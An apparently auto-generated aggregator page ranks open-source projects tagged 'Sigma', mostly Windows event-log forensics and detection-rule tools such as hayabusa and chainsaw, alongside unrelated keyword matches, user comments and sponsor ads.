The APIs are flexible and easy-to-use, supporting authentication, user identity, and complex enterprise features like SSO and SCIM provisioning. Learn more →
Top 17 Sigma Open-Source Projects
-
hayabusa
Hayabusa (隼) is a sigma-based threat hunting and fast forensics timeline generator for Windows event logs.
-
InfluxDB
Power Real-Time Data Analytics at Scale. Get real-time insights from all types of time series data with InfluxDB. Ingest, query, and analyze billions of data points in real-time with unbounded cardinality.
-
dj-stripe
dj-stripe automatically syncs your Stripe Data to your local database as pre-implemented Django Models allowing you to use the Django ORM, in your code, to work with the data making it easier and faster.
-
WorkOS
The modern identity platform for B2B SaaS. The APIs are flexible and easy-to-use, supporting authentication, user identity, and complex enterprise features like SSO and SCIM provisioning.
-
SaaSHub
SaaSHub - Software Alternatives and Reviews. SaaSHub helps you find the best software and product alternatives
Project mention: Agent event queue is flooded. Check the agent configuration | /r/Wazuh | 2023-06-30
Project mention: Hayabusa: Sigma-based forensics timeline generator for Windows event logs | news.ycombinator.com | 2024-04-24
If you don't want to use Pegasus or another paid product (presumably because of the cost), the packages I'd reach for are django-allauth for login/user stuff and dj-stripe for the Stripe integration. As for teams, there wasn't a library I was happy with so I rolled my own for Pegasus, but some people like django-tenants. It's too heavyweight for my taste as it requires a more complex dev/test/infrastructure setup with Postgres schemas, as opposed to having a single-database and handling multitenancy in the application layer. But there are pros and cons to both approaches.
Peter continues his work on walletdb refactoring (PR #1239), which optimizes performance by using a single instance of CWalletDB. It is about 90% done and is estimated to be done by the end of the week.
Project mention: Vector: A high-performance observability data pipeline | news.ycombinator.com | 2024-03-17We're building something similar at Tenzir, but more for operational security workloads. https://docs.tenzir.com
Differences to Vector:
- An agent has optional indexed storage, so you can store your data there and pick it up later. The storage is based on Apache Feather, Parquet's little brother.
- Pipelines operators both work with data frames (Arrow record batches) or chunks of bytes.
- Structured pipelines are multi-schema, i.e., a single pipeline can process streams of record batches with different schemas.
Project mention: EnableWindowsLogSettings: Documentation and scripts to properly enable Windows event logs. | /r/blueteamsec | 2023-06-04
Also have an instance of S1EM - https://github.com/V1D1AN/S1EM - running, monitoring my home LAN, firewall etc. It's huge overkill, and your machine may struggle to run it if you ran anything else with it, but might be worth looking at.
I am currently employed as a cyber analyst, and we've recently implemented an Endpoint Detection and Response (EDR) system. Upon closer inspection, I've observed that numerous events are not being flagged as alerts. This raises a crucial question: should I take the initiative to create custom rules to ensure these events are brought to our attention, or should I rely solely on the EDR's intrinsic capabilities to detect and classify threats? As a potential solution, I'm contemplating the implementation of rules based on Sigma, such as those available at the following repository: here. Your insights and experiences on the effectiveness of this approach would be greatly appreciated. Thank you for your time and assistance.
Sigma related posts
- should we write our own custom rule
- Chainsaw for Linux
- Webapp for converting sigma detection rules into SIEM queries
- A tool to detect errors early and measure the Effectiveness of SIEM rules against the behaviors that the rule was developed to work against, ensuring that the whole process of data collection, parsing, and query of security data is working properly and alert when things don't work as intended
- The Ultimate Sigma Starter-Kit
- Up your grindset with a true sigma serverless API, made with Next.js
- Up your grindset with a true sigma serverless API
-
A note from our sponsor - WorkOS
workos.com | 27 Apr 2024
Index
What are some of the best open-source Sigma projects? This list will help you:
Project | Stars | |
---|---|---|
1 | chainsaw | 2,547 |
2 | hayabusa | 1,922 |
3 | dj-stripe | 1,544 |
4 | firo | 704 |
5 | WELA | 651 |
6 | tenzir | 611 |
7 | Zircolite | 596 |
8 | EnableWindowsLogSettings | 442 |
9 | S1EM | 387 |
10 | SIGMA-detection-rules | 265 |
11 | hayabusa-rules | 108 |
12 | sysmon | 55 |
13 | Automata | 48 |
14 | automathon | 47 |
15 | sigma-male-grindset-api | 18 |
16 | sigma-convert | 6 |
17 | sigma-essentials | 0 |
Sponsored